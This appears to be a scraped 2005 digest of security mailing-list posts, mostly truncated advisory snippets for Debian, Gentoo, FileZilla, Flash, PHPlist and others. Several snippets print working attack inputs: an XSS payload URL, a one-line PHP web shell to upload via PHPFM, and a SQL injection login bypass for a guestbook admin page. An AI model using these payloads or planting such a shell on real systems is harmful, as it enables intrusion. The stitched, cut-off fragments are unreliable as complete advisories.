url: http://eusecwest.com
url: http://pacsec.jp
(PacSec/Tokyo Announcement below...)
EUSecWest/core06 CALL FOR PAPERS
London Security Summit February 20/21 2006
LONDON, United Kingdom -- Applied technical security
will be the focus of a new annual conference
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200511-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200511-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
Debian Security Advisory DSA 886-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
November 7th, 2005
** Inge Henriksen Security Advisory [EMAIL PROTECTED] **
I have discovered a buffer overflow in FileZilla Server Terminal 0.9.4d. The
exploit is still to be considered as a work in progress as it is still not
clear to me why the exploit works on some systems and not others. Please let me
know
SEC-CONSULT Security Advisory 20051107-1
===
title: Macromedia Flash Player ActionDefineFunction
Memory Corruption
program: Macromedia Flash Plugin
Debian Security Advisory DSA 884-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
November 7th, 2005
names.co.uk is an English registrar and web hosting company.
Their frames-based hosting option has an XSS vulnerability allowing injection
of arbitrary Javascript. For example:
http://www.weddingbiz.co.uk/%22%3E%3Cframe%20src%3D%22javascript%3Aalert%281%29%22%20
According to webhosting.info,
On 06 Nov 05, at 01:00, [EMAIL PROTECTED] wrote:
Then you never really understood the implementation, seems. Of
course
all implementations keep the content of the directory as read with
getdents or so in the DIR descriptor. But it is usually not the case
that the whole content fits into the
upload phpshell in PHPFM
discovered by rUnViRuS
www.worlddefacers.net
www.security-arab.com
=-=-=-=-=-=-=-=-=
the code shell :-
---
pre
?
passthru($_GET['cmd']);
?
save as cmd.php
now upload in PHPFM
=-=-=-=
Used Shell
=-=-=-=
www.site.com/[file upload
Fast translation of benji's advisory
***
Author : benjilenoob
WebSite : http://benji.redkod.org/ and http://www.redkod.org/
Audit in pdf : http://benji.redkod.org/audits/ipb.2.1.pdf
Product : Invision power board
Version
Assurance.com.au - Vulnerability Advisory
---
Release Date:
07-Nov-2005
Software:
Asterisk Web-VoiceMail (Comedian VoiceMail)
http://www.asterisk.org/
Asterisk is a complete PBX in software. It runs on Linux, BSD and MacOSX and
provides all of
Guestbook 2.2 web application (PHP, MySQL) appears vulnerable to SQL Injection
granting the attacker administrator access.
Target :
http://www.example.com/[GuestbookTarget]/admin.php
Username: ' or 1=1 /*
Password: (Nothing)(Blank)
It's Working On Advanced Guestbook 2.2 version 2.3.1 will
You are right
mamboserver solution is available now:
The fix is easy,
in /component/com_content/content.php
Approx Line 190 Change the block FROM:
Code:
// Paramters
$params = new stdClass();
if ( $Itemid ) {
$menu = new mosMenu( $database );
On 11/5/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
Why not:
4. Require the readdir() implementation to use state local to dirp.
I've never understood the rationale behind readdir_r;
Then you never really understood the implementation, seems. Of course
all implementations keep the
Then you never really understood the implementation, seems. Of course
all implementations keep the content of the directory as read with
getdents or so in the DIR descriptor. But it is usually not the case
that the whole content fits into the buffer allocated. One could, of
course, resize the
On 11/6/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
I don't see how that is relevant; the typical use of readdir() is as follows:
DIR *dirp = opendir(name);
while ((dent = readdir(dirp)) != NULL) {
...
}
closedir(dirp);
Nothing other
You can insert a highscore into game_score.php using the POST method. The system
uses these variables, so a simple form will allow you to add a highscore.
$player_name = $_POST['name'];
$player_score = $_POST['score'];
$game_name = $_POST['game'];
willeh
willey_wonka at hotmail dot com
Advisory:Multiple vulnerabilities in PHPlist
Name:TKADV2005-11-001
Revision:1.0
Release Date:2005/11/07
Last Modified: 2005/11/07
Author: Tobias Klein (tk
Sony Vaio laptops require you to create a user account the first time you start
your laptop. If the user you select is not Administrator, Sony still goes
ahead and creates a user Administrator with a blank password.
This user does not show up in control panel under User Accounts but if you do